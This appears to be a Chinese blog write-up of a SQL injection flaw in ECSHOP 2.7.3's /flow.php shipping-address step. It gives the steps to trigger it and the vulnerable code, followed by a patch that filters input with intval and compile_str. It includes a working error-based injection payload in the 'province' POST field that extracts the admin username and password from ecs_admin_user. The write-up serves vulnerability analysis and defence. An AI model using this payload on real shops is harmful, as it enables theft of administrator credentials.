标签:
catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
Relevant Link:
http://sebug.net/vuldb/ssvid-60554
2. 漏洞触发条件
1. 先注册账户,随便选个商品进购物车,然后填地址,电话等等 2. 把任意商品加入购物车在填写配送地址那一页,有地区选择 3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1 //比如省选择安徽 3. 其中POST数据如下 country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3 用firefox tamper data改成 localhost province=3‘) and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 # 4. 就会回显错误页面了
Relevant Link:
http://www.2cto.com/Article/201212/179861.html
3. 漏洞影响范围
4. 漏洞代码分析
/flow.php
elseif ($_REQUEST[‘step‘] == ‘consignee‘) { ... //未对POST数据进行有效过滤 else { /* * 保存收货人信息 */ $consignee = array( ‘address_id‘ => empty($_POST[‘address_id‘]) ? 0 : intval($_POST[‘address_id‘]), ‘consignee‘ => empty($_POST[‘consignee‘]) ? ‘‘ : trim($_POST[‘consignee‘]), ‘country‘ => empty($_POST[‘country‘]) ? ‘‘ : $_POST[‘country‘], ‘province‘ => empty($_POST[‘province‘]) ? ‘‘ : $_POST[‘province‘], ‘city‘ => empty($_POST[‘city‘]) ? ‘‘ : $_POST[‘city‘], ‘district‘ => empty($_POST[‘district‘]) ? ‘‘ : $_POST[‘district‘], ‘email‘ => empty($_POST[‘email‘]) ? ‘‘ : $_POST[‘email‘], ‘address‘ => empty($_POST[‘address‘]) ? ‘‘ : $_POST[‘address‘], ‘zipcode‘ => empty($_POST[‘zipcode‘]) ? ‘‘ : make_semiangle(trim($_POST[‘zipcode‘])), ‘tel‘ => empty($_POST[‘tel‘]) ? ‘‘ : make_semiangle(trim($_POST[‘tel‘])), ‘mobile‘ => empty($_POST[‘mobile‘]) ? ‘‘ : make_semiangle(trim($_POST[‘mobile‘])), ‘sign_building‘ => empty($_POST[‘sign_building‘]) ? ‘‘ : $_POST[‘sign_building‘], ‘best_time‘ => empty($_POST[‘best_time‘]) ? ‘‘ : $_POST[‘best_time‘], ); ..
5. 防御方法
/flow.php
elseif ($_REQUEST[‘step‘] == ‘consignee‘) { ... else { /* * 保存收货人信息 */ $consignee = array( /* 对用户输入的POST数据进行有效过滤 */ ‘address_id‘ => empty($_POST[‘address_id‘]) ? 0 : intval($_POST[‘address_id‘]), ‘consignee‘ => empty($_POST[‘consignee‘]) ? ‘‘ : compile_str(trim($_POST[‘consignee‘])), ‘country‘ => empty($_POST[‘country‘]) ? ‘‘ : intval($_POST[‘country‘]), ‘province‘ => empty($_POST[‘province‘]) ? ‘‘ : intval($_POST[‘province‘]), ‘city‘ => empty($_POST[‘city‘]) ? ‘‘ : intval($_POST[‘city‘]), ‘district‘ => empty($_POST[‘district‘]) ? ‘‘ : intval($_POST[‘district‘]), /* */ ‘email‘ => empty($_POST[‘email‘]) ? ‘‘ : compile_str($_POST[‘email‘]), ‘address‘ => empty($_POST[‘address‘]) ? ‘‘ : compile_str($_POST[‘address‘]), ‘zipcode‘ => empty($_POST[‘zipcode‘]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[‘zipcode‘]))), ‘tel‘ => empty($_POST[‘tel‘]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[‘tel‘]))), ‘mobile‘ => empty($_POST[‘mobile‘]) ? ‘‘ : compile_str(make_semiangle(trim($_POST[‘mobile‘]))), ‘sign_building‘ => empty($_POST[‘sign_building‘]) ? ‘‘ :compile_str($_POST[‘sign_building‘]), ‘best_time‘ => empty($_POST[‘best_time‘]) ? ‘‘ : compile_str($_POST[‘best_time‘]), ); ..
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
ecshop /flow.php SQL Injection Vul
标签:
原文地址:http://www.cnblogs.com/LittleHann/p/4523902.html
